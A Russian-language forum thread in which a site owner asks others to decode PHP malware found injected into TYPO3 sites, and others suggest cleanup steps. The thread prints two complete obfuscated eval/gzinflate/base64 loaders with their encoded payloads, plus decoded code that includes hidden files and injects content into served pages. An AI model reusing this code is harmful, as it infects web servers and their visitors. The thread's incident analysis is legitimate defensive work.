Вход

Просмотр полной версии : Помогите что за вирус?


semender
25.10.2012, 15:40
недавно на всех typo3 сайтах на одном из моих серверов, во всех php файлах обнаружил добавленным такой код. Вот пытаюсь расшифровать, никак не выходит, помогите пожалуйста.

$md5 = "89bc86968a0ff8960b640edcf06de95e";
$a6 = array('t',"_","6",'4',"n",'z','g','c',")",'s','f',"l","i","a","v",'b','$','d',"e","o",';',"r",'(');
$b65 = create_function('$'.'v',$a6[18].$a6[14].$a6[13].$a6[11].$a6[22].$a6[6].$a6[5].$a6[12].$a6[4].$a6[10].$a6[11].$a6[13].$a6[0].$a6[18].$a6[22].$a6[15].$a6[13].$a6[9].$a6[18].$a6[2].$a6[3].$a6[1].$a6[17].$a6[18].$a6[7].$a6[19].$a6[17].$a6[18].$a6[22].$a6[16].$a6[14].$a6[8].$a6[8].$a6[8].$a6[20]);
$b65('DZZFssWIAQOPk5nywkyVlZmZvUmZmZ/x9PlnkFrq6srGf5qvm+sx+1X/5NlREdj/yqpYyuqf//BpKh6LmzGDF0MgJTOA10GeRRVmqbJYyGMFuQEE1Po4aVDHA4C0 e1lwBuYcCAJRmnuVDmrUSmnHCoKdNUpxM9fgDPtD4FRGUTUD2w koqEkCLM5Hc1vSnjds0o42PmaEc/GMurKJ59ZJcpgb1KlAg8o0UZM9QvFL4gGs9hYWwDQI8ip9RtuT Gr/6SNGLh8H4sOO+az6eEjUHXUx9uKGUkO1QVXB2sE4DUlJCsOSCu yL5uHzoXTp4aT+1lZ+axGvekJ18FotlTmXeJwlQ1Vvg/rQy5EYERvJQ3m1SuLiaj2De4vrRrh3DB8l0A+vlDYhAvzYRfix v/lXljPXpDj/k4NAua/HobotcsBQoZZuuyZGgWnpVGpP4gTYURDi+SOa/I03I8i1MHf+Zatw9TeMk4bnwFuqDkvTlqIYCiLSMZDNuVENh+j TWFYOguo9oFZsp/G7npVV+l7JF3l+OOVchwcCkhzRv6Lwt79Q8Dw6q4suv+3rN63T v2DRucGBcZyUXg3FEB4e7NX7ulKZQbV4G8Vj6jpEBeVfU8z0bi I6Ti0nCyYcU2ddl1OwkDOd+CqpTZGkpEhIYhheU/Zpj6m0t79dpO1l+X56AfSmTr06/Wq50ardgXjCuQo+XSRfvR1xH9GncemDEHLShMux/68ZHhk0z+XvxQEKs5zkR9AGv5DGU/K0tkaMr2Qmo70RnXnydef/MklaamrF+omG208OAfnXHTOSvH5VzES8sZsQ5aNqxvVwl3Wm1N HXe/vxpeqojiSs9KojbmZFa1mZzZXBCjq6x/NDCQTZ1SjWS4qcmAbEn5+ZyK5BkpKzf1vd8jhhtrHa+pZKtc8p P5Xhev4e7XgUA7kSLw65Zfwjfyc0Cy0YvAmjVapixD1kynzH7f rbEtLu3lJNo9T8TNS8ZHDyUu4QXN5/9wDnPBIiqJThDhhmKNlWCZ9XaAOC2QpAYSTss3jEpzqEjERcZs 3sqXoAWZcK31YYtkj8YMzHx7XlvGlk/8UWGvBhaf6c2SfcBJ95LrljBaucBrQzK3Oo/3gS4bzT+zDlCDbwRg2tD/PJfU01gLgllM8S1ZaqssZJup3HnrUwQsOomBbCKcvZ016Evv9V x7zkYNLjL/Eeeq5l7jLc3TJ0SUN7qZNGkNLYLTuzrzN9eziNzWqVbRPcppWj 4NWuyA8EL/7FyFtX25Qzc+J0pa0WXZ9Q6AsnKaaJ1tV6VMc7Prl/N/MYvC2yAfBmQO4XY/GihkHPubneS9rObntCwNn2C8HGIHQ0OKW0s3iZvahfMZEzl2uM QrvHl74d2sjGU47acvaAw5tWUE3XnKGv2PWhi6dJDcRRTwF8qe CzYtE9JMhCYjuZUJLq+yYajuLjEB1AGieCzdsJUtTHg1c/pTdTXWiG6VUO4eNFt06rFebBTcVBQSI3/LNwdE3XWewNy0MwBWluUR5HmTNHP39sKP86rxWa6GHO29wW7A3/VJ+/aB93V5A/HKRlqr7sHNv6dFEz22USKqzXkttzYCT9aNhu2nHFz2qbZAnk1d 4LgQevxmmqN3TGkqUUGgEYFluvtML3v8xNL3U7ChGLEiWUzhOE AdF6v0GXyBveEvkHHQdcEk8TzQfrnRyj/MNgOt0QouHRXOXeROcslhJh4DdADD5suFu5+DVqe+gWR4By8wo/4mxYvDGjISXQcwGiIjQSi97UfMybrV2p+IH877bT0nJbT7PJ+O mH9vXJw18dU4ORlOIJxRo7RGNbTOd5n7FoZtFEkfCHvc19oy2k 25xtsHyWAnT1SlZr0REu9UrGj97cuDlpDNHqCWuaQtw+9k03A9 gjQfChGIHX0+Tq72V/zLjIu6uU3hK/UtWfqVEMqHAygUNf++HRO6ADU/L79+uTH6h8D6BtlseCkXt94CXrhJtPQY1rPUMxRzM60zNxX/TVDG6mjFzRH7FPAq//cbKBo3fH56JzRQWQxWOH8GXgLTym6jeMSQPYYvYtA/teUZRzWfcz3VfFSaju4woyQQHpDVAa0IuHYswpfRFG3YUrwKEZ mc1df3T0j4SJn3uyBv5KPVcJdbuPO76zbVxnNNa7w69LZLYAfk t4LfmLXCpgH4kwLfM3yJUhKjhSR7akMyEJEB4mYZeFa1cXiTw6 w0gOT3P1YKuUQtlIHEFObVbLIJEXh7eHqU68npQx0PDG81/oj86ztrTGV9gcYP/i0Q7IaZj8ZrQ4pa1IYGYu6GzgaACbOXpIrgLh0L/yt2I7876a40OaX10glXsmeWbPzrlz6Rj2YBa7y/MTpbTEC4WVVwrvtPls7B9+AT6yOAwUD4MD73Kl2iAmOwaSsLGK MdXcvpLGG5J7cxgmtLD5OrQ7Ny+qVCwi4ZAOB7LuGOveFQHOOZ syCXYHcFhH5/GWQUEJEOUooSvliAbTJUtIoFXb1Q91t2Xxju6gje0Xc3g7lXoy NUuYJg1QPw874Pbt2TmAwDcjFVtk4hc9CAszUjapW/qxL2m1uA+TR7yxiOYu/sDu+Udl4E+bp+aElOUMCbVSph3CSTZ2gIAt3Thzrc2OVqP4BOy CpUZ/2v+mgRo0D2Pramb2VNIf9U5/2ytmrKbIlqIZWxpeq5JEsDtRjbLQ/giQKx/ALpR2MEVrw19zTXEZ8UcZMV9oqjd/wSjjt20d4grgK5w7jYdqWqWSz2TD5n5eMOSWHDd5TtH/nRH+6aUPyz49OixlWGBIPEQwYKDx3QQYFMKn82T/N32/4GiMYkH9kvRCO9ScTCIwhj2/+3ICE/mxU2Q6uzmlN2/USFqD0rKBfpwwy5GPjC1gFHvUINvFWE19YVR9NW9lt/tEpQsDj/HOiKInjE4PJZD/zTKU+dNGTpEfsYJBYBz1t1fi54Q+lmulEnCM+0ItAD7LzjzlWD CJM0jYGS3eXiu9JSEKxIayis3CWM/wD+e3bY5E4r02mtPrlBNaZ5/SR0r39fLJaVCWbgFiRzdX7xRK/H4HRgsO201mZEs6e2DechqHPGwHPm2BV1zUI0iRIsf/5999///t/');

видно что создается функция
function lambda($v)
{
return eval(gzinflate(base64_decode($v)));
};

Но при вызове в таком порядке текст всё равно не читаем.

Ивано
25.10.2012, 18:49
Возможно Вы поставили что то левое - или кто-то взломал-поиграл...
Что добавляет этот код - если это php - то нужно искать файл, который перезаписывает файлы...

У меня был случай - после работы по FTP во всех js-файлах был добавлен уродский код... Из-за него антивирусы блокировали сайт.
Он добавлялся из одного места и постепенно при запросе новых страниц, распространился на весь сайт - во все js скрипты...

Лечил очень просто...
Заменил все что *.js на оригинал из скачанного с сайта typo3.org

Т.к. у Вас php- то скорее всего кто-то уже знает пароль к FTP...

Ивано
25.10.2012, 18:51
Сюдя по тому, что он выполняет функцию eval - значит это какая-то команда.
Можно попробовать вместе расшифровать - если показать все что есть по вирусу...

dmartynenko
25.10.2012, 20:08
А что еще из ПО у вас стоит на сайтах?
У нас один раз похожую заразу залили через дыру в OpenX.

В любом случае рецепт - сменить все пароли. Заменить файлы ядра на оригинальные. Из экстов - либо вручную, либо тоже обновить через репозиторий (если все их него).

semender
25.10.2012, 23:00
Возможно Вы поставили что то левое - или кто-то взломал-поиграл...
Что добавляет этот код - если это php - то нужно искать файл, который перезаписывает файлы...

У меня был случай - после работы по FTP во всех js-файлах был добавлен уродский код... Из-за него антивирусы блокировали сайт.
Он добавлялся из одного места и постепенно при запросе новых страниц, распространился на весь сайт - во все js скрипты...

Лечил очень просто...
Заменил все что *.js на оригинал из скачанного с сайта typo3.org

Т.к. у Вас php- то скорее всего кто-то уже знает пароль к FTP...

да да, я так и делаю: в ext отчищаю вручную,файлы движка заменяю оригинальными из новоскаченного, перенес все сайты на другой сервер,переустановил этот. Сейчас мне интересно что ж он делает та такого злодейского)

semender
25.10.2012, 23:04
Сюдя по тому, что он выполняет функцию eval - значит это какая-то команда.
Можно попробовать вместе расшифровать - если показать все что есть по вирусу...

я понял что выполняется, только вот как раскодировать последнее???
ну так это и есть всё что есть, в каждом файле такое, свой md5 и свой массив.Но функция одна и та же по видимому.
<?php
$md5 = "b7673e7d076c0db93f15da24c610a75e";
$a6 = array(";",'l',"(","z","a",'n','d','$',"_","4",'t','g','v',"r",'c',"6","f",'e',"i",'s',')','b','o');
$b61 = create_function('$'.'v',$a6[17].$a6[12].$a6[4].$a6[1].$a6[2].$a6[11].$a6[3].$a6[18].$a6[5].$a6[16].$a6[1].$a6[4].$a6[10].$a6[17].$a6[2].$a6[21].$a6[4].$a6[19].$a6[17].$a6[15].$a6[9].$a6[8].$a6[6].$a6[17].$a6[14].$a6[22].$a6[6].$a6[17].$a6[2].$a6[7].$a6[12].$a6[20].$a6[20].$a6[20].$a6[0]);
$b61('DZW3roRYAgU/Z2dEgHfaCNt475MV0Hjv+/L1+9ITlqp0qjsf/2nebq7H/Kz+KfKjooj/faty+Vb//EfMPFm8YpVzY8d8cfAMQD967n3oiu3K16QtezZgfgvzNUmu+Vl hOt+83V9gEKzJqaUOs4P5uUAPw4w5OOS3nOXGVYJPr2fPyoRVd 2cTpNckfg49OG4hO9Qz+yRPyardGuUB4bYdB2ghApNFzYzBWRh LXwDjMk41hJDLFYYa7tGKFcZFE1kL0cm5H3rpEQhwUHRv8os4/GMgggwdBKINIaEQ1PBMHCZlETPXCdWgK0lhySftCdLBcCIi2ik GC1J0IkhEGkumm/R71cJ6i03TyXzQt9jmC0s8JNBNHukMpJF36HyuiyzaVuPL0zLU D/Gz9RHVtU8khIHlDJ/cWK4D7rZQwmSMzijPrSUU4dEBI/E+4paEnxLHZh5+BROXsZUavYvrx+y90dGsop0tBzadQ/0+PYoRe1xOSZauXXm90/pCudmxrVcx/eG9ycjzu+n3IqpODvb9DPEp8KQPs2tBBay3iy+l/uIOeUj6LGYYyl05g8p9oY6AK62hxJR0BpEdyX5G62EbiUggpdF BCVxURPyUSWUlo8t6MfbvaOkE4jwAbFjHKsly3br6TBGw7Odlc dNwgGZKR7zSzazne6j5ezcQSBsJAf9ACZyoXOlzHJo6mxTzmH5 HnXQxlUhc6/qzOUoUL/iY3jKjCG9vpKmmbDzBUcdRKfpvj7hJ8COX3fjEinJSaytScqfd CkKT2BQzMzenJCzEaYzMQrJ4o8pKd0IIKz3N7UjdAR9uU/cdTxazAbYmV5ZjyfrPeZJZfSeObWFo6lgU25f2fTCf/Q6lmY2Ukai8PAh203i/6/uDtafDu8irVlyIyVTcP4hwENA6j0twJQd257g0j2F6qbgZHLfM V1ES/K6/JhBjlvVYq+VfLBQe+v3zIfGPP8vCM6tZr4wbFZs7LRMb5BxNyy An+BflmkbaN2A8IQwx3rv33lVpego46LKCj7/5RH5ctyCCkzILNpgZGCoa/UgGxBR0oGqa8cntRP+EQZlNmsXUM9SpA5mrZBRliIASwNXGuvj ENdJzOGq4Q/7k37+sN3qxNqjX6gxXwAgh1OinIB1O7f2Si3ql0H1NjIOGT9DG C745WdPmt+vU3ragVraIq7zvw1SHxoR/cyFd+DrhQMlTgG9MBGWO8Mculpy0KFJMxPj95Y3K9PGNMfxLNn k0Tr+vwbWwyB9MQkERDvLCjjxppIb1FL2hY3CGUl3W3nbJ92Mv 7I3o6GqTYZdGAOc4fZu1HMoe7eleKGhoJaALGUQT7i4JEGHfoG p6xr215a/AfRpbWt6tUs1WEBynqMjRC6CLeQ/STAozHJVQKJ7IPyjw5+9LCIu85QtCoMNZIWS2O88be+3Li/b810oxo6g5Y3UaUJVjAEMlkpR0BmzuB4f/4uNilpx0uAp5+rTom35WYVElrnV5OEqIz7X/DNUZmYGPO9fwufHIVqnkzYx+zeO47uA5ihYcZ8rokBQEKSGn/2gb9bJg2rxsYEBS0jaTvaHLQG7TUhg4YDPBBLpR6F8f8VfaqKu InCqS0ITzvk1SnWvKEbTfNf4LjqenTMz13inxs2iTmKlIh2aLW BRFiK9kVlKgAOpz22O8xyIyet+0pJtESkrbkoU40eXeq+pjVNo pIyDsxjrdA5zkp8yOl04bcEjISNqpxHcPSPX9drqaWeD3dRPpd wEmraupfsb9OcpeD6YkulBqutmF8ySwQhpaT9KXZd36qjAshbG 5tNvVmiK5wcZ6PaFqQqvgjviQ410lYQ0yxy+qDIZig7npXveO2 S65nUTOfgRa43VTHrrZz0ob6KGXNKRLhQEkt0TjCKwZnu3n1rS vq6HlHrfFc4Wnuyt/LgXWqfY+IjOdyvWPXXn1fp1pWWkfgxmbF3oyWsaLgM0ZFc90hP IdNgJ/x3CGpZD89tPzGZDaq5g/WEzJi9B1Y5ZsbX3PQyeehRlQRUZj4g8FE2zAqLKcMQav9jCMoG ncsBPh0qrgN5P37ruR5lfJ20qrerb1O7m06eLrn/CCSzGZE39UlY6uK25GuTPxtmu9P2/j0qfsA8UqpPx5v8nRdH04zmiWay+m4jIii/EE3gzTX9S28uQJuTq4hL1bZ9ZSUFx5Wjuv8Hu3mHZRP12vSZhI aDjMkiwMwzjuwIzyn3///fe//wc=');
?>

semender
25.10.2012, 23:11
А что еще из ПО у вас стоит на сайтах?
У нас один раз похожую заразу залили через дыру в OpenX.

В любом случае рецепт - сменить все пароли. Заменить файлы ядра на оригинальные. Из экстов - либо вручную, либо тоже обновить через репозиторий (если все их него).

Вроде никаких сторонних скриптов нет...Стоит ещё wordpress на серваке.Интересно что его даже не затронуло,там этого кода ни в каких файлах нет.Почему-то именно typo3.

Ивано
25.10.2012, 23:39
Не пойму, откуда Вы взяли function lambda($v)
И откуда create_function?

У меня получилось только
eval(gzinflate(base64_decode($v)));


Мурашки по коже...

semender
25.10.2012, 23:43
Не пойму, откуда Вы взяли function lambda($v)
И откуда create_function?

У меня получилось только
eval(gzinflate(base64_decode($v)));


Мурашки по коже...

Эт я просто написал, create_function — Создаёт анонимную (лямбда) функцию, чтоб легче подставить можно было для выполнения.Скопировал с кода, когда тэстил.

Ивано
25.10.2012, 23:50
Каково значение переменной $v?
eval(gzinflate(base64_decode($v))); - что сюда передается?

semender
26.10.2012, 00:47
Каково значение переменной $v?
eval(gzinflate(base64_decode($v))); - что сюда передается?

всё что в последней строке $b65('здесь');

Ивано
26.10.2012, 01:04
Насколько понял - это связано с файловой системой и зашифровкой интеллектуальной собственности...

А расшифровать это дело можно так:
http://www.tareeinternet.com/scripts/decrypt.php
http://www.tareeinternet.com/forum/knowledgebase/274-decoding-eval-gzinflate-base64_decode.html

--
--

semender
26.10.2012, 02:09
Насколько понял - это связано с файловой системой и зашифровкой интеллектуальной собственности...

А расшифровать это дело можно так:
http://www.tareeinternet.com/scripts/decrypt.php
http://www.tareeinternet.com/forum/knowledgebase/274-decoding-eval-gzinflate-base64_decode.html

--
--

Да действительно, теперь расшифровал один из файлов(просто тот уже удалить успел)
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/palata/mrg/public_html/typo3/sysext/t3skin/icons/ext/user_photomarathon/photomarathon/04b.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

Он ссылается на файл 04b.php. В нем та же фигня,и в этой папке полно таких файлов.надеюсь и дальше теперь продвинемся.

вот расшифровал и 04b.php

/*ounelpejlrbklsrtwdjxjouyltothgpopdfmcdwfrzbpnjklr v*/ function FF97A1D7A5B771B21D423C3A9D78408C1($RC4A5B5E310ED4C 323E04D72AFAE39F53){ global $_GET, $_POST; ignore_user_abort(true); $GLOBALS['dg_echo'] = 1; set_time_limit(600); if(!is_writable($GLOBALS['dgcp'].$GLOBALS['dgin'])){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#a00000'>{$GLOBALS['dgcp']}{$GLOBALS['dgin']}</b>"); return; } $RF89F518E40FF53B4FD2A7D2440090D63 = ''; $RDAD8D40EB9906CAB35CCB38DE41CB7EF = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C 323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); F0B4D6FFC759ED013DCD398174DE471F8(); if(!FD768CE2E61B0A13220C1408BA2911626($RDAD8D40EB9 906CAB35CCB38DE41CB7EF)){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:red\">no php quotes</b> [e1]"); die; } F3B82ABE1785C7013E7CC0CA01EF61AA8("{$RC4A5B5E310ED4C323E04D72AFAE39F53}: ".strlen($RDAD8D40EB9906CAB35CCB38DE41CB7EF)); if(!FD37A89A1AF9ECAFCB257CADA0D7E94C3($RDAD8D40EB9 906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:red\">failed to set path</b> [e2]"); die; } F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:green\">path set to {$GLOBALS['dgcp']}</b> [s1]"); if(!FD37A89A1AF9ECAFCB257CADA0D7E94C3($RDAD8D40EB9 906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:red\">failed to set name</b> [e3]"); die; } F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:green\">name set to {$GLOBALS['dgin']}</b> [s2]"); if(!FD37A89A1AF9ECAFCB257CADA0D7E94C3($RDAD8D40EB9 906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:red\">failed to set relative root dir</b> [e4]"); die; } F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:green\">relative root dir successfully set {$GLOBALS['dgsp']}</b> [s3]"); $RCFFAE742FB4E724571041779A10EFDA9 = F873C7424258BCBB4AE958DCB051B6110($RDAD8D40EB9906C AB35CCB38DE41CB7EF, rand(5, 10), 1, 1); $RCFFAE742FB4E724571041779A10EFDA9 = F9248B5B41A3DDFDCDF5FCF3647F21442($RCFFAE742FB4E72 4571041779A10EFDA9, 1); FB9B6F2F343184DBE3D84656B8346EDC1($GLOBALS['dgcp'].$GLOBALS['dgin']."tmp", $RCFFAE742FB4E724571041779A10EFDA9, 1) ? F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#009000'>{$GLOBALS['dgcp']}{$GLOBALS['dgin']}tmp</b>") : F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#a00000'>{$GLOBALS['dgcp']}{$GLOBALS['dgin']}tmp</b>"); $R9DB9E103E88D622316D42B508D6D11AB = implode("", file($GLOBALS['dgcp'].$GLOBALS['dgin']."tmp")); if(!strpos($R9DB9E103E88D622316D42B508D6D11AB, '?'.'>')){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#a00000'>wf {$GLOBALS['dgcp']}{$GLOBALS['dgin']}tmp</b>"); return; } copy($GLOBALS['dgcp'].$GLOBALS['dgin']."tmp", $GLOBALS['dgcp'].$GLOBALS['dgin']) ? F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#009000'>{$GLOBALS['dgcp']}{$GLOBALS['dgin']}</b>") : F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#a00000'>rf {$GLOBALS['dgcp']}{$GLOBALS['dgin']}</b>"); unlink($GLOBALS['dgcp'].$GLOBALS['dgin']."tmp"); if($GLOBALS['dgsp'] && !isset($_GET['noinj']) && !isset($_POST['noinj'])){ FBD8F1A7E6108CC853593E347434C7287(); if(count($GLOBALS['dg_wpi']) > 0){ F7641DA7BE8C09F5807EB8CA8DD8C0B9A($GLOBALS['dg_wpi'][0], 1, $GLOBALS['dgij']); F7A0DC6FCF5A00BB584F0024BBAC75D65($GLOBALS['dgsp'], 0, 0); }else{ F7A0DC6FCF5A00BB584F0024BBAC75D65($GLOBALS['dgsp'], 1, 0); } } F18C82E54B87D91FDCDBDBEF3DF051362(); } if(!function_exists('gzdecode')){ function gzdecode($R20FD65E9C7406034FADC682F06732868){ $R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20 FD65E9C7406034FADC682F06732868,3,1)); $R60169CD1C47B7A7A85AB44F884635E41=10; $R0D54236DA20594EC13FC81B209733931=0; if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){ $R0D54236DA20594EC13FC81B209733931=unpack('v',subs tr($R20FD65E9C7406034FADC682F06732868,10,2)); $R0D54236DA20594EC13FC81B209733931=$R0D54236DA2059 4EC13FC81B209733931[1]; $R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA2 0594EC13FC81B209733931; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){ $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65 E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A 7A85AB44F884635E41)+1; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){ $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65 E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A 7A85AB44F884635E41)+1; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){ $R60169CD1C47B7A7A85AB44F884635E41+=2; } $RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(subst r($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47 B7A7A85AB44F884635E41)); if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){ $RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406 034FADC682F06732868; } return $RC4A5B5E310ED4C323E04D72AFAE39F53; } } if(!function_exists('dgobh')){ function dgobh($RDA3E61414E50AEE968132F03D265E0CF){ header('Content-Encoding: none'); $RDA3E61414E50AEE968132F03D265E0CF = gzdecode($RDA3E61414E50AEE968132F03D265E0CF); if($GLOBALS['dgopt']['lbp'] == 2 && preg_match('/\<\/body/si',$RDA3E61414E50AEE968132F03D265E0CF)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n$1",$RDA3E61414E50AEE968132F03D265E0CF); }elseif($GLOBALS['dgopt']['lbp'] == 0 && preg_match('/\<body/si',$RDA3E61414E50AEE968132F03D265E0CF)){ return preg_replace('/(\<body[^\>]*\>)/si', "$1".gml(),$RDA3E61414E50AEE968132F03D265E0CF); }else{ return gml().$RDA3E61414E50AEE968132F03D265E0CF; } }}

Ивано
26.10.2012, 02:19
У меня было тоже самое но с JS-как ранее писал.
Поменял пароль - и все ОК - уже пол года:D!

А вообще - резервное копирование после существенных изменений - самое лучшее лекарство...


--
Интересно будет узнать, к чему приведут поиски...

ms9
05.11.2012, 21:37
Стоят 777 на localconf.php